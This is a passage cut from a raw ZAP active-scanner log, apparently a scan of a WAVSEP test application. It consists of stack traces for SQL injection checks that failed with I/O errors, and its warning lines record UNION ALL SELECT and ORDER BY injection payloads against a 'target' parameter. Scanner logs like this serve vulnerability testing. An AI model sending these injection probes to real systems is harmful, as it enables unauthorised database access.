org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679534 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679535 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679536 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679536 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679537 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 5793#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 5793# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679537 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679539 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679539 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679540 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679540 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679542 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679542 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679544 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL 